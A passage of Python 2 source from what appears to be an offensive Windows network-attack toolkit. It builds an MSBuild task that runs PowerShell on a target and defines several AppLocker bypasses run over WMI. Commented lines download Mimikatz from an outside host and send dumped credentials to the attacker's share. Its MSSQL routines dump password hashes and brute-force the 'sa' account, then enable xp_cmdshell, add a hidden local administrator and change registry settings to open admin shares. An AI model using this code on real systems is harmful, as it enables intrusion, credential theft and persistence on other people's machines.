{\\n'\n    '               public override bool Execute()\\n'\n    '               {                   \\n'\n    '                   try\\n'\n    '                   {\\n'\n    '                       string x = @\\\"'+str(cmd).strip()+'\";\\n'\n    '                       Console.WriteLine(RunPSCommand(x));\\n'\n    '                   }\\n'\n    '                   catch (Exception e)\\n'\n    '                   {\\n'\n    '                       Console.WriteLine(e.Message);\\n'\n    '                   }\\n'\n    '                  return true;\\n'\n    '               }\\n'\n    '               \\n'\n            '               public static string RunPSCommand(string cmd)\\n'\n    '               {\\n'\n    '                   //Init stuff\\n'\n    '                   Runspace runspace = RunspaceFactory.CreateRunspace();\\n'\n    '                   runspace.Open();\\n'\n    '                   RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);\\n'\n    '                   Pipeline pipeline = runspace.CreatePipeline();\\n'\n    '                   //Add commands\\n'\n    '                   pipeline.Commands.AddScript(cmd);\\n'\n    '                   //Prep PS for string output and invoke\\n'\n    '                   pipeline.Commands.Add(\"Out-String\");\\n'\n    '                   Collection<PSObject> results = pipeline.Invoke();\\n'\n    '                   runspace.Close();\\n'\n    '                   //Convert records to strings\\n'\n    '                   StringBuilder stringBuilder = new StringBuilder();\\n'\n    '                   foreach (PSObject obj in results)\\n'\n    '                   {\\n'\n    '                       stringBuilder.Append(obj);\\n'\n    '                   }\\n'\n    '                   return stringBuilder.ToString().Trim();\\n'\n    '                }\\n'\n    '                \\n'\n    '                public static void RunPSFile(string script)\\n'\n    '               {\\n'\n    '                   PowerShell ps = PowerShell.Create();\\n'\n    '                   ps.AddCommand(\"Set-ExecutionPolicy\").AddArgument(\"Unrestricted\");\\n'\n    '                   ps.AddScript(script).Invoke();\\n'\n    '               }\\n'\n    '           }\\n'\n    '        ]]>\\n'\n    '      </Code>\\n'\n    '    </Task>\\n'\n    '  </UsingTask>\\n'\n    '</Project>\\n')\n    f = open(origScriptPath+\"/loot/\"+'build.xml', 'w')\n    f.write(query)\n    f.close()\n\n    #cmd = 'powershell \"IEX (New-Object Net.WebClient).DownloadString(\\'http://'+targetIP+':8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds | Out-File \\\\\\\\'+myIP+'\\\\guest\\\\'+targetIP+'_mimikatz.txt\"'\n    #f = open(origScriptPath+\"/loot/\"+'callMimikatz.ps1', 'w')\n    #f.write(cmd)\n    #f.close()\n\n    cmd = 'copy \\\\\\\\'+myIP+'\\\\guest\\\\build.xml C:\\\\windows\\\\temp /y'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)    \n    \n    #cmd = 'copy \\\\\\\\'+myIP+'\\\\guest\\\\callMimikatz.ps1 C:\\\\windows\\\\temp'\n    #results=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)    \n    if getCPUType(targetIP,domain,username,password,passwordHash)==True:\n        filename='C:\\Windows\\Microsoft.NET\\Framework64\\\\v4.0.30319\\msbuild.exe'\n    else:\n        filename='C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe'\n    cmd = 'dir '+filename   \n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n    if \"The system cannot find the file specified\" not in results:\n        cmd = filename+\" C:\\\\windows\\\\temp\\\\build.xml\"\n        return cmd\n\ndef appLockerBypass3(targetIP, domain, username, password, passwordHash,command):    \n    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[applocker]\", color=\"green\"))+\" | AppLocker Bypass Technique 3\"    \n    cmd = 'copy \\\\\\\\'+myIP+'\\\\guest\\\\powershell.exe C:\\\\windows\\\\tasks'\n    runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd)   \n    cmd = 'C:\\windows\\\\tasks\\powershell.exe -ep bypass -Command \\\"'+command+'\\\"'\n    return cmd\n\ndef appLockerBypass4(targetIP, domain, username, password, passwordHash,command):    \n    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[applocker]\", color=\"green\"))+\" | AppLocker Bypass Technique 4\"    \n    #https://github.com/Cn33liz/CScriptShell\n    if getCPUType(targetIP,domain,username,password,passwordHash)==True:\n        filename='C:\\Windows\\Microsoft.NET\\Framework64\\\\v3.5\\csc.exe '\n    else:\n        filename='C:\\Windows\\Microsoft.NET\\Framework\\\\v3.5\\csc.exe '\n    cmd = 'dir '+filename   \n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n\n    #shutil.copy(origScriptPath+'/modules/bypass/CScriptShell.cs.template', '/modules/bypass/CScriptShell.cs')\n    with open(origScriptPath+'/modules/bypass/CScriptShell.cs.template', 'r') as file :\n        filedata = file.read()        \n    #filedata = filedata.replace('PLACEHOLDER', 'IEX (New-Object Net.WebClient).DownloadString(\\'http://is.gd/oeoFuI\\'); Invoke-Mimikatz -DumpCreds | Out-File \\\\\\\\\\\\\\\\'+myIP+'\\\\\\\\guest\\\\\\\\'+targetIP+'_mimikatz.txt')\n    #command=command.replace(\"Out-File \\\\\",\"Out-File \\\\\\\\\\\\\\\\\")\n    #command=command.replace(\"'\",\"\\\\'\")\n    command=command.replace(\"\\\\\",\"\\\\\\\\\")\n    filedata = filedata.replace('PLACEHOLDER', command)\n    with open(origScriptPath+'/modules/bypass/CScriptShell.cs', 'w') as file:\n        file.write(filedata)\n    if \"The system cannot find the file specified\" not in results:\n        uploadFile(\"\\\\bypass\\\\key.snk\",\"key.snk\",targetIP, domain, username, password, passwordHash)\n        uploadFile(\"\\\\bypass\\\\System.Management.Automation.dll\",\"System.Management.Automation.dll\",targetIP, domain, username, password, passwordHash)\n        uploadFile(\"\\\\bypass\\\\CScriptShell.cs\",\"CScriptShell.cs\",targetIP, domain, username, password, passwordHash)\n        uploadFile(\"\\\\bypass\\\\CScriptShell.js\",\"CScriptShell.js\",targetIP, domain, username, password, passwordHash)\n        cmd = filename+' /r:System.EnterpriseServices.dll,C:\\\\windows\\\\temp\\\\System.Management.Automation.dll /target:library /out:C:\\\\windows\\\\temp\\\\CScriptShell.dll /keyfile:C:\\\\windows\\\\temp\\\\key.snk C:\\\\windows\\\\temp\\\\CScriptShell.cs'\n        result,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n        if debugMode==True:\n            print cmd\n            print results\n        #cmd = 'SCHTASKS /RL HIGHEST /Create /SC MONTHLY /RU '+username+' /RP '+password+' /MO first /D SUN /F /TN microsoftschedulertest /TR \"C:\\\\Windows\\\\System32\\\\cscript.exe c:\\\\windows\\\\temp\\\\CScriptShell.js\"'\n        #cmd = 'SCHTASKS /RL HIGHEST /Create /SC MONTHLY /RU milo /MO first /D SUN /F /TN microsoftschedulertest /TR \"C:\\\\Windows\\\\System32\\\\cscript.exe c:\\\\windows\\\\temp\\\\CScriptShell.js\"'\n        cmd = 'C:\\\\Windows\\\\System32\\\\cscript.exe c:\\\\windows\\\\temp\\\\CScriptShell.js'\n        return cmd\n\n    #C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe /r:System.EnterpriseServices.dll,System.Management.Automation.dll /target:library /out:CScriptShell.dll /keyfile:key.snk CScriptShell.cs\n    #cscript.exe CScriptShell.js\ndef listDatabases(db,conn):\n    sql_query='USE master; SELECT NAME FROM sysdatabases;'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    dbList=[]\n    defaultDBList=[]\n    defaultDBList.append('master')\n    defaultDBList.append('tempdb')\n    defaultDBList.append('model')\n    defaultDBList.append('msdb')\n    for x in results:\n        for k, v in x.iteritems():\n            if v not in defaultDBList:  \n                dbList.append(v)\n    return dbList\n\ndef listTables(db,conn,dbName):\n    sql_query='SELECT * FROM '+dbName+'.INFORMATION_SCHEMA.TABLES;'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    tableList=[]\n    for x in results:\n        if x.values()[3]=='BASE TABLE':\n            tableList.append([x.values()[0],x.values()[2]])\n    return tableList\n    #print tabulate(tableList)\n\ndef listColumns(db,conn,dbName,tableName):\n    sql_query='use '+dbName+';exec sp_columns '+tableName+';'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    columnList=[]\n    for x in results:\n        columnName=x.values()[-1]\n        columnList.append([dbName,tableName,columnName])\n    return columnList\n    #print tabulate(results)\n\ndef sampleData(db,conn,dbName,tableName):\n    sql_query='use '+dbName+';select * from '+tableName+';'\n    try:\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        return results\n    except Exception as e:\n        print e\n\ndef dumpSQLHashes(db,conn,pre2008=True):\n    resultList=[]\n    if pre2008==False:\n        sql_query='SELECT name,password_hash FROM sys.sql_logins;'\n        print sql_query\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        for x in results:\n            print x.values()\n            resultList.append(x.values)\n    else:\n        sql_query='SELECT password from master.dbo.sysxlogins;'\n        print sql_query\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        for x in results:\n            print x.values()\n            resultList.append(x.values)\n    return resultList\n\n'''    \ndef runSQLQuery(hostNo,user,password,query):\n    tmpResultList=[]\n    #conn = pymssql.connect(hostNo, user, password, \"tempdb\")\n    conn = pymssql.connect(hostNo, user, password, \"master\")\n    cursor = conn.cursor()\n    cursor.execute(query)\n    row = cursor.fetchone()\n    tmpResultList.append(row)\n    #while row:\n    #        tmpList=(row[0].split(\"\\t\"))\n    #        for x in tmpList:\n    #                x=x.strip()\n    #                if len(x)>0:\n    #                    tmpResultList.append(x)\n    #        row = cursor.fetchone()            \n    conn.close()\n    return tmpResultList\n'''    \n\ndef getSQLVersion(db,conn):\n    sql_query='USE master; select @@version'\n    print sql_query\n    runSQLQuery(hostNo,user,password,query)\n\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    return results[0].values()\n\ndef runSQLQuery(hostNo,user,password,query):\n    tmpResultList=[]\n    try:\n        conn = pymssql.connect(hostNo, user, password, database=\"master\")\n        cursor = conn.cursor()\n        cursor.execute(query)\n        row = cursor.fetchone()\n        while row:\n                if len(row)>0:\n                    tmpResultList.append(row)\n                    row = cursor.fetchone()            \n        conn.close()\n    except pymssql.OperationalError:\n        pass\n    return tmpResultList\n\ndef bruteMSSQLAuto(hostNo,portNo):\n    wordList=[]\n    wordList.append(\"111111\")\n    wordList.append(\"123456\")\n    wordList.append(\"12345678\")\n    wordList.append(\"1qaz2wsx\")\n    wordList.append(\"2003\")\n    wordList.append(\"2008\")\n    wordList.append(\"95\")\n    wordList.append(\"98\")\n    wordList.append(\"Autumn2013\")\n    wordList.append(\"Autumn2014\")\n    wordList.append(\"Autumn2015\")\n    wordList.append(\"Autumn2016\")\n    wordList.append(\"Autumn2017\")\n    wordList.append(\"P@55w0rd!\")\n    wordList.append(\"P@55w0rd\")\n    wordList.append(\"P@ssw0rd!\")\n    wordList.append(\"P@ssw0rd\")\n    wordList.append(\"P@ssword!\")\n    wordList.append(\"PassSql12\")\n    wordList.append(\"Password!\")\n    wordList.append(\"Password1!\")\n    wordList.append(\"Password1\")\n    wordList.append(\"Password12\")\n    wordList.append(\"Password2\")\n    wordList.append(\"SQLSQLSQLSQL\")\n    wordList.append(\"Spring2013\")\n    wordList.append(\"Spring2014\")\n    wordList.append(\"Spring2015\")\n    wordList.append(\"Spring2016\")\n    wordList.append(\"Spring2017\")\n    wordList.append(\"SqlServer\")\n    wordList.append(\"Sqlserver\")\n    wordList.append(\"Summer2008\")\n    wordList.append(\"Summer2009\")\n    wordList.append(\"Summer2010\")\n    wordList.append(\"Summer2011\")\n    wordList.append(\"Summer2012\")\n    wordList.append(\"Summer2013\")\n    wordList.append(\"Summer2014\")\n    wordList.append(\"Summer2015\")\n    wordList.append(\"Summer2016\")\n    wordList.append(\"Summer2017\")\n    wordList.append(\"Welcome1212\")\n    wordList.append(\"Welcome123\")\n    wordList.append(\"Welcome1234\")\n    wordList.append(\"Winter2008\")\n    wordList.append(\"Winter2009\")\n    wordList.append(\"Winter2010\")\n    wordList.append(\"Winter2011\")\n    wordList.append(\"Winter2012\")\n    wordList.append(\"Winter2013\")\n    wordList.append(\"Winter2014\")\n    wordList.append(\"Winter2015\")\n    wordList.append(\"Winter2016\")\n    wordList.append(\"Winter2017\")\n    wordList.append(\"abc\")\n    wordList.append(\"abc123\")\n    wordList.append(\"abcd123\")\n    wordList.append(\"account\")\n    wordList.append(\"admin\")\n    wordList.append(\"adminadmin\")\n    wordList.append(\"administator\")\n    wordList.append(\"admins\")\n    wordList.append(\"air\")\n    wordList.append(\"alpine\")\n    wordList.append(\"autumn2013\")\n    wordList.append(\"autumn2014\")\n    wordList.append(\"autumn2015\")\n    wordList.append(\"autumn2016\")\n    wordList.append(\"autumn2017\")\n    wordList.append(\"bankbank\")\n    wordList.append(\"baseball\")\n    wordList.append(\"basketball\")\n    wordList.append(\"bird\")\n    wordList.append(\"burp\")\n    wordList.append(\"change\")\n    wordList.append(\"changelater\")\n    wordList.append(\"changeme\")\n    wordList.append(\"company!\")\n    wordList.append(\"company\")\n    wordList.append(\"company1!\")\n    wordList.append(\"company1\")\n    wordList.append(\"company123\")\n    wordList.append(\"complex\")\n    wordList.append(\"complex1\")\n    wordList.append(\"complex2\")\n    wordList.append(\"complex3\")\n    wordList.append(\"complexpassword\")\n    wordList.append(\"database\")\n    wordList.append(\"default\")\n    wordList.append(\"dev\")\n    wordList.append(\"devdev\")\n    wordList.append(\"devdevdev\")\n    wordList.append(\"dirt\")\n    wordList.append(\"dragon\")\n    wordList.append(\"earth\")\n    wordList.append(\"fire\")\n    wordList.append(\"football\")\n    wordList.append(\"goat\")\n    wordList.append(\"god\")\n    wordList.append(\"guessme\")\n    wordList.append(\"hugs\")\n    wordList.append(\"letmein\")\n    wordList.append(\"login\")\n    wordList.append(\"march2011\")\n    wordList.append(\"master\")\n    wordList.append(\"microsoft\")\n    wordList.append(\"monkey\")\n    wordList.append(\"network\")\n    wordList.append(\"networking\")\n    wordList.append(\"networks\")\n    wordList.append(\"nt\")\n    wordList.append(\"pass\")\n    wordList.append(\"password!\")\n    wordList.append(\"password\")\n    wordList.append(\"password1\")\n    wordList.append(\"password12\")\n    wordList.append(\"password123\")\n    wordList.append(\"password2\")\n    wordList.append(\"princess\")\n    wordList.append(\"private\")\n    wordList.append(\"qa\")\n    wordList.append(\"qwerty\")\n    wordList.append(\"qwertyuiop\")\n    wordList.append(\"rain\")\n    wordList.append(\"sa\")\n    wordList.append(\"sasa\")\n    wordList.append(\"secret!\")\n    wordList.append(\"secret\")\n    wordList.append(\"secret1!\")\n    wordList.append(\"secret12\")\n    wordList.append(\"secret1212\")\n    wordList.append(\"secret123\")\n    wordList.append(\"secuirty3\")\n    wordList.append(\"security\")\n    wordList.append(\"security1\")\n    wordList.append(\"security3\")\n    wordList.append(\"server\")\n    wordList.append(\"snow\")\n    wordList.append(\"solo\")\n    wordList.append(\"someday\")\n    wordList.append(\"spring2013\")\n    wordList.append(\"spring2014\")\n    wordList.append(\"spring2015\")\n    wordList.append(\"spring2016\")\n    wordList.append(\"spring2017\")\n    wordList.append(\"sql\")\n    wordList.append(\"sql2000\")\n    wordList.append(\"sql2003\")\n    wordList.append(\"sql2005\")\n    wordList.append(\"sql2008\")\n    wordList.append(\"sql2009\")\n    wordList.append(\"sql2010\")\n    wordList.append(\"sql2011\")\n    wordList.append(\"sqlaccount\")\n    wordList.append(\"sqlpass\")\n    wordList.append(\"sqlpass123\")\n    wordList.append(\"sqlpassword\")\n    wordList.append(\"sqlserver\")\n    wordList.append(\"sqlserver2000\")\n    wordList.append(\"sqlserver2005\")\n    wordList.append(\"sqlsql\")\n    wordList.append(\"sqlsqlsqlsql\")\n    wordList.append(\"sqlsqlsqlsqlsql\")\n    wordList.append(\"sqlsvr\")\n    wordList.append(\"starwars\")\n    wordList.append(\"summer2008\")\n    wordList.append(\"summer2009\")\n    wordList.append(\"summer2010\")\n    wordList.append(\"summer2011\")\n    wordList.append(\"summer2012\")\n    wordList.append(\"summer2013\")\n    wordList.append(\"summer2014\")\n    wordList.append(\"summer2015\")\n    wordList.append(\"summer2016\")\n    wordList.append(\"summer2017\")\n    wordList.append(\"sysadmin\")\n    wordList.append(\"test\")\n    wordList.append(\"test-sql3\")\n    wordList.append(\"testing\")\n    wordList.append(\"testing123\")\n    wordList.append(\"testsql\")\n    wordList.append(\"testtest\")\n    wordList.append(\"trust\")\n    wordList.append(\"unchanged\")\n    wordList.append(\"unknown\")\n    wordList.append(\"vista\")\n    wordList.append(\"water\")\n    wordList.append(\"welcome\")\n    wordList.append(\"welcome1\")\n    wordList.append(\"welcome2\")\n    wordList.append(\"wicked\")\n    wordList.append(\"winter2008\")\n    wordList.append(\"winter2009\")\n    wordList.append(\"winter2010\")\n    wordList.append(\"winter2011\")\n    wordList.append(\"winter2012\")\n    wordList.append(\"winter2013\")\n    wordList.append(\"winter2014\")\n    wordList.append(\"winter2015\")\n    wordList.append(\"winter2016\")\n    wordList.append(\"winter2017\")\n    wordList.append(\"xp\")\n    query=\"USE master; select @@version\"\n    continueNext=False\n    while continueNext==False:\n        for password in wordList:\n            tmpResultList=runSQLQuery(hostNo,'sa',password,query)\n            if len(tmpResultList)>0:\n                #tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | sa:\"+password+\" | \"+(setColor(\"[MSSQL] [Bruteforce|Found Account]\", bold, color=\"green\"))\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+(setColor(\"[MSSQL] [Bruteforce|Found Account]\", bold, color=\"green\"))+\" | sa:\"+password\n                username='sa'                \n                domain=''\n                status=checkXPCMDShell(hostNo,port,username,password,domain)\n                if status==False:\n                    enableXPCMDShell(hostNo,port,username,password,domain)\n                cmd='net user '+tmpCreateUsername+' '+tmpCreatePassword+' /add'\n                execXPCMDShell(hostNo,port,username,password,domain,cmd)\n                cmd='net localgroup administrators '+tmpCreateUsername+' /add'\n                execXPCMDShell(hostNo,port,username,password,domain,cmd)\n                cmd='net localgroup administrators'\n                tmpResultList=execXPCMDShell(hostNo,port,username,password,domain,cmd)\n                if tmpCreateUsername in str(tmpResultList):\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | sa:\"+password+\" | \"+(setColor(\"[Adding Local Admin Account]\", bold, color=\"green\"))+\" | \"+tmpCreateUsername+\":\"+tmpCreatePassword\n                    if testAccountSilent(hostNo, 'WORKGROUP', tmpCreateUsername, tmpCreatePassword, None)==True:\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+tmpCreateUsername+\":\"+tmpCreatePassword+\" | \"+(setColor(\"[Testing Access]\", bold, color=\"green\"))+(setColor(\" [OK]\", bold, color=\"blue\"))\n                        tmppasswordHash=None\n                        tmpPasswordList=runMimikatz(hostNo,'WORKGROUP',tmpCreateUsername,tmpCreatePassword,tmppasswordHash)\n                        for y in tmpPasswordList:\n                            if y not in userPassList:\n                                userPassList.append(y)            \n                        #if len(tmpPasswordList)>0:\n                        #    print \"\\n\"\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                        tmpHashList=dumpDCHashes(hostNo,'WORKGROUP',tmpCreateUsername,tmpCreatePassword,tmppasswordHash)\n                    else:\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+tmpCreateUsername+\":\"+tmpCreatePassword+\" | \"+(setColor(\"[Testing Access]\", bold, color=\"green\"))+\" No Access\"\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | sa:\"+password+\" | \"+(setColor(\"[Enable ADMIN Shares]\", bold, color=\"green\"))+\" | Require Rebooting\"\n                        cmd1='reg add HKLM\\\\system\\\\currentcontrolset\\\\services\\\\lanmanserver\\\\parameters /v AutoShareWks /t reg_dword /d 1 /f'\n                        cmd2='reg add HKLM\\\\system\\\\currentcontrolset\\\\services\\\\lanmanserver\\\\parameters /v AutoShareServer /t reg_dword /d 1 /f'\n                        cmd3='reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System /v LocalAccountTokenFilterPolicy /t reg_dword /d 1 /f'\n                        cmd = cmd1+\" && \"+cmd2+\" && \"+cmd3\n                        tmpResultList=execXPCMDShell(hostNo,port,username,password,domain,cmd)\n                        #if \"The operation completed successfully.\" in str(tmpResultList):\n                    dumpMSSQLHash(hostNo,portNo,username,password,domain)\n                    dumpMSSQLIDF(hostNo,portNo,username,password,domain)\n                    #runMimikatz(hostNo,'workgroup',tmpCreateUsername,tmpCreatePassword,None)\n\n                    continueNext=True\n                    break\n        continueNext=True\n\ndef bruteMSSQL(hostNo,portNo):\n    wordList=[]\n    wordList.append(\"111111\")\n    wordList.append(\"123456\")\n    wordList.append(\"12345678\")\n    wordList.append(\"1qaz2wsx\")\n    wordList.append(\"2003\")\n    wordList.append(\"2008\")\n    wordList.append(\"95\")\n    wordList.append(\"98\")\n    wordList.append(\"Autumn2013\")\n    wordList.append(\"Autumn2014\")\n    wordList.append(\"Autumn2015\")\n    wordList.append(\"Autumn2016\")\n    wordList.append(\"Autumn2017\")\n    wordList.append(\"P@55w0rd!\")\n    wordList.append(\"P@55w0rd\")\n    wordList.append(\"P@ssw0rd!\")\n    wordList.append(\"P@ssw0rd\")\n    wordList.append(\"P@ssword!\")\n    wordList.append(\"PassSql12\")\n    wordList.append(\"Password!\")\n    wordList.append(\"Password1!\")\n    wordList.append(\"Password1\")\n    wordList.append(\"Password12\")\n    wordList.append(\"Password2\")\n    wordList.append(\"SQLSQLSQLSQL\")\n    wordList.append(\"Spring2013\")\n    wordList.append(\"Spring2014\")\n    wordList.append(\"Spring2015\")\n    wordList.append(\"Spring2016\")\n    wordList.append(\"Spring2017\")\n    wordList.append(\"SqlServer\")\n    wordList.append(\"Sqlserver\")\n    wordList.append(\"Summer2008\")\n    wordList.append(\"Summer2009\")\n    wordList.append(\"Summer2010\")\n    wordList.append(\"Summer2011\")\n    wordList.append(\"Summer2012\")\n    wordList.append(\"Summer2013\")\n    wordList.append(\"Summer2014\")\n    wordList.append(\"Summer2015\")\n    wordList.append(\"Summer2016\")\n    wordList.append(\"Summer2017\")\n    wordList.append(\"Welcome1212\")\n    wordList.append(\"Welcome123\")\n    wordList.append(\"Welcome1234\")\n    wordList.append(\"Winter2008\")\n    wordList.append(\"Winter2009\")\n    wordList.append(\"Winter2010\")\n    wordList.append(\"Winter2011\")\n    wordList.append(\"Winter2012\")\n    wordList.append(\"Winter2013\")\n    wordList.append(\"Winter2014\")\n    wordList.append(\"Winter2015\")\n    wordList.append(\"Winter2016\")\n    wordList.append(\"Winter2017\")\n    wordList.append(\"abc\")\n    wordList.append(\"abc123\")\n    wordList.append(\"abcd123\")\n    wordList.append(\"account\")\n    wordList.append(\"admin\")\n    wordList.append(\"adminadmin\")\n    wordList.append(\"administator\")\n    wordList.append(\"admins\")\n    wordList.append(\"air\")\n    wordList.append(\"alpine\")\n    wordList.append(\"autumn2013\")\n    wordList.append(\"autumn2014\")\n    wordList.append(\"autumn2015\")\n    wordList.append(\"autumn2016\")\n    wordList.append(\"autumn2017\")\n    wordList.append(\"bankbank\")\n    wordList.append(\"baseball\")\n    wordList.append(\"basketball\")\n    wordList.append(\"bird\")\n    wordList.append(\"burp\")\n    wordList.append(\"change\")\n    wordList.append(\"changelater\")\n    wordList.append(\"changeme\")\n    wordList.append(\"company!\")\n    wordList.append(\"company\")\n    wordList.append(\"company1!\")\n    wordList.append(\"company1\")\n    wordList.append(\"company123\")\n    wordList.append(\"complex\")\n    wordList.append(\"complex1\")\n    wordList.append(\"complex2\")\n    wordList.append(\"complex3\")\n    wordList.append(\"complexpassword\")\n    wordList.append(\"database\")\n    wordList.append(\"default\")\n    wordList.append(\"dev\")\n    wordList.append(\"devdev\")\n    wordList.append(\"devdevdev\")\n    wordList.append(\"dirt\")\n    wordList.append(\"dragon\")\n    wordList.append(\"earth\")\n    wordList.append(\"fire\")\n    wordList.append(\"football\")\n    wordList.append(\"goat\")\n    wordList.append(\"god\")\n    wordList.append(\"guessme\")\n    wordList.append(\"hugs\")\n    wordList.append(\"letmein\")\n    wordList.append(\"login\")\n    wordList.append(\"march2011\")\n    wordList.append(\"master\")\n    wordList.append(\"microsoft\")\n    wordList.append(\"monkey\")\n    wordList.append(\"network\")\n    wordList.append(\"networking\")\n    wordList.append(\"networks\")\n    wordList.append(\"nt\")\n    wordList.append(\"pass\")\n    wordList.append(\"password!\")\n    wordList.append(\"password\")\n    wordList.append(\"password1\")\n    wordList.append(\"password12\")\n    wordList.append(\"password123\")\n    wordList.append(\"password2\")\n    wordList.append(\"princess\")\n    wordList.append(\"private\")\n    wordList.append(\"qa\")\n    wordList.append(\"qwerty\")\n    wordList.append(\"qwertyuiop\")\n    wordList.append(\"rain\")\n    wordList.append(\"sa\")\n    wordList.append(\"sasa\")\n    wordList.append(\"secret!\")\n    wordList.append(\"secret\")\n    wordList.append(\"secret1!\")\n    wordList.append(\"secret12\")\n    wordList.append(\"secret1212\")\n    wordList.append(\"secret123\")\n    wordList.append(\"secuirty3\")\n    wordList.append(\"security\")\n    wordList.append(\"security1\")\n    wordList.append(\"security3\")\n    wordList.append(\"server\")\n    wordList.append(\"snow\")\n    wordList.append(\"solo\")\n    wordList.append(\"someday\")\n    wordList.append(\"spring2013\")\n    wordList.append(\"spring2014\")\n    wordList.append(\"spring2015\")\n    wordList.append(\"spring2016\")\n    wordList.append(\"spring2017\")\n    wordList.append(\"sql\")\n    wordList.append(\"sql2000\")\n    wordList.append(\"sql2003\")\n    wordList.append(\"sql2005\")\n    wordList.append(\"sql2008\")\n    wordList.append(\"sql2009\")\n    wordList.append(\"sql2010\")\n    wordList.append(\"sql2011\")\n    wordList.append(\"sqlaccount\")\n    wordList.append(\"sqlpass\")\n    wordList.append(\"sqlpass123\")\n    wordList.append(\"sqlpassword\")\n    wordList.append(\"sqlserver\")\n    wordList.append(\"sqlserver2000\")\n    wordList.append(\"sqlserver2005\")\n    wordList.append(\"sqlsql\")\n    wordList.append(\"sqlsqlsqlsql\")\n    wordList.append(\"sqlsqlsqlsqlsql\")\n    wordList.append(\"sqlsvr\")\n    wordList.append(\"starwars\")\n    wordList.append(\"summer2008\")\n    wordList.append(\"summer2009\")\n    wordList.append(\"summer2010\")\n    wordList.append(\"summer2011\")\n    wordList.append(\"summer2012\")\n    wordList.append(\"summer2013\")\n    wordList.append(\"summer2014\")\n    wordList.append(\"summer2015\")\n    wordList.append(\"summer2016\")\n    wordList.append(\"summer2017\")\n    wordList.append(\"sysadmin\")\n    wordList.append(\"test\")\n    wordList.append(\"test-sql3\")\n    wordList.append(\"testing\")\n    wordList.append(\"testing123\")\n    wordList.append(\"testsql\")\n    wordList.append(\"testtest\")\n    wordList.append(\"trust\")\n    wordList.append(\"unchanged\")\n    wordList.append(\"unknown\")\n    wordList.append(\"vista\")\n    wordList.append(\"water\")\n    wordList.append(\"welcome\")\n    wordList.append(\"welcome1\")\n    wordList.append(\"welcome2\")\n    wordList.append(\"wicked\")\n    wordList.append(\"winter2008\")\n    wordList.append(\"winter2009\")\n    wordList.append(\"winter2010\")\n    wordList.append(\"winter2011\")\n    wordList.append(\"winter2012\")\n    wordList.append(\"winter2013\")\n    wordList.append(\"winter2014\")\n    wordList.append(\"winter2015\")\n    wordList.append(\"winter2016\")\n    wordList.append(\"winter2017\")\n    wordList.append(\"xp\")\n    query=\"USE master; select @@version\"\n    continueNext=False\n    while continueNext==False:\n        for password in wordList:\n            tmpResultList=runSQLQuery(hostNo,'sa',password,query)\n            if len(tmpResultList)>0:\n                #tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | sa:\"+password+\" | \"+(setColor(\"[MSSQL] [Bruteforce|Found Account]\", bold, color=\"green\"))\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+(setColor(\"[MSSQL] [Bruteforce|Found Account]\", bold, color=\"green\"))+\" | sa:\"+password\n                continueNext=True\n                break\n        continueNext=True\n\ndef checkXPCMDShell(hostNo,port,username,password,domain):\n    query=\"select convert(int,isnull(value,value_in_use)) as config_value from sys.configurations where name='xp_cmdshell';\"                \n    conn = pymssql.connect(hostNo, username, password, database=\"master\")\n    cursor = conn.cursor()\n    cursor.execute(query)\n    value = (cursor.fetchone())[0]\n    if value==0:\n        return False\n    else:\n        return True\n\ndef execXPCMDShell(hostNo,port,username,password,domain,cmd):\n    query=\"EXEC xp_cmdshell '\"+cmd+\"'\"\n    conn = pymssql.connect(hostNo, username, password, database=\"master\")\n    cursor = conn.cursor()\n    cursor.execute(query)\n    row = cursor.fetchall()\n    return row\n\ndef enableXPCMDShell(hostNo,port,username,password,domain):\n    print \"enable\"\n    query=\"EXEC Sp_configure 'show advanced options', 1; EXEC Sp_configure 'xp_cmdshell', 1;\"\n    conn = pymssql.connect(hostNo, username, password, database=\"master\")\n    cursor = conn.cursor()\n    cursor.execute(query)\n    conn.commit()\n\ndef disableXPCMDShell(hostNo,port,username,password,domain):\n    print \"disable\"\n    query=\"EXEC Sp_configure 'show advanced options', 1; EXEC Sp_configure 'xp_cmdshell', 0;\"\n    conn = pymssql.connect(hostNo, username, password, database=\"master\")\n    cursor = conn.cursor()\n    cursor.execute(query)\n    conn.commit()\n\ndef dumpMSSQLHash(hostNo,port,username,password,domain):\n    tmpResultList=[]\n    query=\"USE master; select @@version\"\n    if len(domain)>0:\n        tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n    else:\n        tmpResultList=runSQLQuery(hostNo,username,password,query)\n    if \"2008\" 